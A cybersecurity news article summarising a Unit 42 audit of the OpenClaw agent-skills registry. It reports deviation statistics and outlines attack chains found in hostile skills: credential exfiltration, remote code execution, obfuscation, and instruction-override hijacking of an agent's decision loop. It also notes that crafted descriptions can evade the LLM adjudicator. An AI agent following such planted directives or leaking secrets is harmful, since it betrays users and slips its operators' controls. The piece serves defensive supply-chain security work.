Skip to main content
Cybersecurity

AI Skills Marketplace Exposes Security Gaps

Researcher's workspace with laptop, notes, and diagrams on whiteboard and paper.

OpenClaw's registry held 49,943 agent “skills” in early 2026 — and an automated audit found 250,706 behavioral deviations, with 80.0% of skills (39,933) doing something the metadata did not disclose.

Behavioral Integrity Verification (BIV): three surfaces and a 29‑capability taxonomy

Palo Alto Networks' Unit 42 introduces Behavioral Integrity Verification (BIV) as an audit primitive that asks one operational question of every skill: does what it says match what it does? BIV compares behavior across the three surfaces that define a skill: metadata (YAML manifest and schema fields), executable code (Python, JavaScript, shell), and natural‑language instructions (README and SKILL.md).

To make comparisons at registry scale, the researchers used a fixed taxonomy of 29 capabilities organized into seven families: Network, File system, Process execution, Environment, Encoding, Credentials, and Instruction‑level threats. Two parallel tracks populate each capability: a declared track that parses metadata and extracts claims (including LLM‑assisted reads of prose anchored to quoted source spans), and an actual track that inspects code (AST‑level taint analysis, regexes and pattern matching) and reads instructions for prompt‑injection motifs.

OpenClaw crawl: 49,943 skills and 250,706 deviations

BIV was run across all 49,943 skills listed in the OpenClaw registry in early 2026. It surfaced 250,706 behavioral deviations and flagged at least one mismatch in 80.0% of skills. The pipeline ships file‑and‑line evidence pointers so every flagged deviation is auditable by hand.

Deviations were clustered into a 137‑cluster taxonomy and then classified. The researchers report 163,754 deviations were classified by root cause: 81.1% traced to developer oversight (sloppy documentation, helper code, unused declarations, framework dependencies) and 18.9% traced to adversarial intent (with 60% of that adversarial slice focused on data theft and espionage).

Compound threat categories and two dominant multi‑stage chains

Beyond single capabilities, BIV identified four novel compound threat categories formed by multi‑step chains: Exfiltration chains (FILE_READ → base64 → NETWORK_SEND), Remote Code Execution chains (download → write → execute), Code obfuscation (encoding chain → dynamic eval), and Data lineage violations (FILE_READ → FILE_WRITE, often benign). The critical insight is that risk often lives in the chain rather than any single capability.

At the skill level, 5.0% of the registry (2,490 skills) carried multi‑stage attack chains and warrant mandatory security review; 16.8% carried single‑stage adversarial deviations and warrant contextual review; 72.5% were judged benign but under‑specified in documentation. Two patterns dominate the multi‑stage tier: silent credential exfiltration (read a secret, transmit it) and instruction‑override hijacking (take over the agent decision loop, then exfiltrate). Together they account for 88% of multi‑stage chains — making them efficient focus points for reviewers.

Capability‑level signal: where adversarial intent concentrates

Adversarial fractions vary sharply by capability family. Instruction manipulation shows the highest adversarial concentration at 96% — a relatively small surface with a high signal‑to‑noise ratio where almost every undeclared prompt‑control directive is suspect. Credentials are 56% adversarial, reflecting the operational value of secrets. Network capabilities are 37% adversarial. File system and process execution show lower adversarial fractions (10% and 12%, respectively), where routine I/O and invocation dominate raw volume.

Unit 42 argues that a single registry‑wide threshold will either over‑block routine I/O skills or under‑review dangerous categories; instead, they recommend per‑category review tiers keyed to BIV's per‑capability severity (Critical for credentials and instruction‑level capabilities; High for network, process and environment access; Medium for file system and encoding).

What this means for technologists, procurement teams, and incident responders

  • Technologists and security teams: Inventory installed third‑party skills and run a behavioral‑integrity check before installation rather than after. Target review resources first at skills matching the two dominant multi‑stage patterns (credential exfiltration and instruction override).
  • Procurement and platform operators: Use per‑category review thresholds rather than a single binary gate; documentation interventions at the registry can remediate the 81.1% of deviations traced to developer oversight.
  • Incident responders: Treat BIV flags as classifier‑predicted candidates for review, not runtime‑confirmed exploits; investigate multi‑stage chains as coordinated behaviors rather than isolated alerts.

Unit 42 notes important limitations: BIV is static‑only and can miss dynamic dispatch and obfuscated payloads; flagged skills are candidates for review rather than confirmed runtime exploits; and the pipeline is not robust against adversaries who have read the paper and craft descriptions to confuse the LLM adjudicator. Runtime defenses remain necessary for backbone backdoors, retrieval‑corpus poisoning and memory poisoning.

For action, Unit 42 recommends inventorying third‑party skills and requiring a behavioral‑integrity check before installation. Palo Alto Networks highlights Prisma AIRS for layered, real‑time AI protection and offers the Unit 42 AI Security Assessment and Incident Response services; contact numbers for Unit 42 incident response are listed in the original report.

Read the original Unit 42 analysis: https://unit42.paloaltonetworks.com/ai-agent-supply-chain-risks/